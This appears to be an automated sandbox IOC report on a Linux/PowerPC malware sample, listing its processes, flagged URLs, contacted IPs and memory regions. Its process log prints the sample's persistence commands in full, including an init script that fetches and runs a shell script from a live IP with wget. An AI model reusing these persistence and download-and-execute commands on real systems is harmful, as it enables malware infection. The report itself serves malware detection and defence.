Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

/tmp/powerpc.nn.elf

/bin/sh

sh -c "systemctl enable custom.service >/dev/null 2>&1"

/bin/sh

/usr/bin/systemctl

systemctl enable custom.service

/tmp/powerpc.nn.elf

/bin/sh

sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/system

/tmp/powerpc.nn.elf

/bin/sh

sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/system /etc/rcS.d/S99system

/tmp/powerpc.nn.elf

/bin/sh

sh -c "echo \"#!/bin/sh\n# /etc/init.d/powerpc.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting powerpc.nn.elf'\n /tmp/powerpc.nn.elf &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping powerpc.nn.elf'\n killall powerpc.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/powerpc.nn.elf"

/tmp/powerpc.nn.elf

/bin/sh

sh -c "chmod +x /etc/init.d/powerpc.nn.elf >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/powerpc.nn.elf

/tmp/powerpc.nn.elf

/bin/sh

sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

/bin/sh

/usr/bin/mkdir

mkdir -p /etc/rc.d

/tmp/powerpc.nn.elf

/bin/sh

sh -c "ln -s /etc/init.d/powerpc.nn.elf /etc/rc.d/S99powerpc.nn.elf >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/powerpc.nn.elf /etc/rc.d/S99powerpc.nn.elf

/tmp/powerpc.nn.elf

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/systemd/systemd

/usr/lib/systemd/system-environment-generators/snapd-env-generator

/usr/libexec/gnome-session-binary

/bin/sh

/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping

/usr/libexec/gsd-housekeeping

/usr/sbin/gdm3

/etc/gdm3/PrimeOff/Default

/usr/sbin/gdm3

/etc/gdm3/PrimeOff/Default

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

There are 45 hidden processes, click here to show them.

URLs

Name

Malicious

http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi

unknown

Details

Name:	http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi
TargetID:	12
From Memory:	true
Current Path:	/tmp/powerpc.nn.elf
Source:	powerpc.nn.elf
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
URLs found in memory or binary data	Networking

http://193.143.1.70/curl.sh

unknown

Details

Name:	http://193.143.1.70/curl.sh
TargetID:	12
From Memory:	true
Current Path:	/tmp/powerpc.nn.elf
Source:	powerpc.nn.elf
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://193.143.1.70/lol.sh

unknown

Details

Name:	http://193.143.1.70/lol.sh
TargetID:	12
From Memory:	true
Current Path:	/tmp/powerpc.nn.elf
Source:	powerpc.nn.elf
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://193.143.1.70/

unknown

Details

Name:	http://193.143.1.70/
TargetID:	-1
From Memory:	true
Source:	powerpc.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, powerpc.nn.elf.38.dr, custom.service.12.dr
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

IPs

Domain

Country

Malicious

211.124.96.104

unknown

Japan

136.48.196.7

unknown

United States

92.109.12.73

unknown

Netherlands

150.68.222.71

unknown

Japan

155.85.153.212

unknown

United States

223.173.128.58

unknown

Korea Republic of

8.235.149.48

unknown

United States

170.105.187.244

unknown

Japan

108.160.190.144

unknown

United States

125.133.35.237

unknown

Korea Republic of

145.212.93.69

unknown

Netherlands

1.222.207.208

unknown

Korea Republic of

14.204.83.142

unknown

China

4.160.21.196

unknown

United States

19.95.119.98

unknown

United States

193.146.190.54

unknown

Spain

210.98.233.4

unknown

Korea Republic of

84.20.92.177

unknown

Albania

158.20.77.97

unknown

United States

87.123.125.57

unknown

Germany

118.224.52.63

unknown

China

217.140.189.24

unknown

Finland

202.215.11.104

unknown

Japan

69.186.49.118

unknown

United States

73.48.130.84

unknown

United States

84.50.182.240

unknown

Estonia

134.200.112.140

unknown

United States

208.31.149.168

unknown

United States

31.43.165.67

unknown

Ukraine

72.32.161.199

unknown

United States

12.83.207.30

unknown

United States

108.144.192.115

unknown

United States

160.119.156.104

unknown

Mozambique

223.120.243.6

unknown

China

213.41.120.142

unknown

United Kingdom

115.169.201.170

unknown

China

183.42.168.63

unknown

China

68.196.11.98

unknown

United States

41.47.97.202

unknown

Egypt

136.135.253.93

unknown

United States

6.241.109.226

unknown

United States

217.164.83.138

unknown

United Arab Emirates

52.241.55.59

unknown

United States

168.139.6.21

unknown

Turkey

88.19.215.204

unknown

Spain

91.122.73.31

unknown

Russian Federation

210.46.57.27

unknown

China

47.106.77.17

unknown

China

167.164.203.183

unknown

United States

192.134.83.97

unknown

France

23.35.234.222

unknown

United States

168.225.106.213

unknown

United States

211.226.132.127

unknown

Korea Republic of

118.160.200.181

unknown

Taiwan; Republic of China (ROC)

19.58.123.16

unknown

United States

165.107.209.101

unknown

United States

193.143.1.70

unknown

139.127.136.65

unknown

United States

45.241.5.61

unknown

Egypt

49.248.244.177

unknown

India

53.14.78.9

unknown

Germany

5.9.250.61

unknown

Germany

25.33.238.102

unknown

United Kingdom

69.106.123.204

unknown

United States

94.171.90.144

unknown

Netherlands

220.143.24.200

unknown

Taiwan; Republic of China (ROC)

221.170.4.97

unknown

Japan

8.45.84.144

unknown

United States

207.166.5.214

unknown

United States

28.73.93.33

unknown

United States

172.66.116.184

unknown

United States

20.45.235.62

unknown

United States

103.7.234.1

unknown

Australia

191.149.188.47

unknown

Colombia

142.6.128.90

unknown

Canada

80.35.61.163

unknown

Spain

96.165.220.32

unknown

United States

2.39.255.133

unknown

Italy

65.196.120.6

unknown

United States

72.147.99.1

unknown

United States

112.37.7.154

unknown

China

180.201.87.214

unknown

China

70.241.37.134

unknown

United States

134.233.235.123

unknown

United States

176.117.104.133

unknown

Germany

155.212.198.213

unknown

United States

61.128.6.230

unknown

China

67.233.97.53

unknown

United States

195.200.192.218

unknown

Germany

17.101.23.81

unknown

United States

19.77.238.207

unknown

United States

166.60.195.230

unknown

United States

95.181.235.16

unknown

Russian Federation

98.171.233.245

unknown

United States

4.115.188.84

unknown

United States

83.242.217.57

unknown

Russian Federation

206.54.43.76

unknown

United States

109.18.188.2

unknown

France

200.161.124.69

unknown

Brazil

80.215.183.219

unknown

France

There are 90 hidden IPs, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

7fd73bf9b000

page execute read

7fd830ad7000

page read and write

7fd830ebe000

page read and write

7fffa85d1000

page read and write

7fd831209000

page read and write

7fd83137f000

page read and write

56240ac20000

page read and write

5624085f6000

page read and write

7fd73bfb0000

page read and write

7fffa85d9000

page execute read

56240a60a000

page read and write

7fd82c000000

page read and write

7fd83083a000

page read and write

7fd830848000

page read and write

7fd831332000

page read and write

7fd73bfac000

page read and write

7fd830e99000

page read and write

7fd82c021000

page read and write

56240836b000

page execute read

5624085ee000

page read and write

56240a5f4000

page execute and read and write

7fd83133a000

page read and write

There are 12 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
powerpc.nn.elf

Files

Processes

URLs

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportpowerpc.nn.elf

Files

Processes

URLs

IPs

Memdumps

IOC Report
powerpc.nn.elf